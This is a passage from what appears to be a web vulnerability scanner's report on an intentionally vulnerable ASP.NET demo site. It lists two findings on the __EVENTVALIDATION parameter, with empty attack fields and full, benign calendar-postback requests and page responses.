advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8346&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAgQNTwNoIZGRk2nzOdh7ylVk%2FeyJ5RY%2BjJ0hxt08%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLc8%2FmGDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA461%2BEquVTnRfj4pmDApq2nitNhc
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:04 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAgQNTwNoIZGRk2nzOdh7ylVk/eyJ5RY+jJ0hxt08=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLc8/mGDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA461+EquVTnRfj4pmDApq2nitNhc" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:White" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8586&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDApcbqfNsIZGRkeT2Efoem8MK8EETl0ZgZITnafjU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLCkIOtDgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCtOvWUxeLSBMIBCitzCEWKEu5Ryw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:43 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDApcbqfNsIZGRkeT2Efoem8MK8EETl0ZgZITnafjU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLCkIOtDgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCtOvWUxeLSBMIBCitzCEWKEu5Ryw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:White" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a 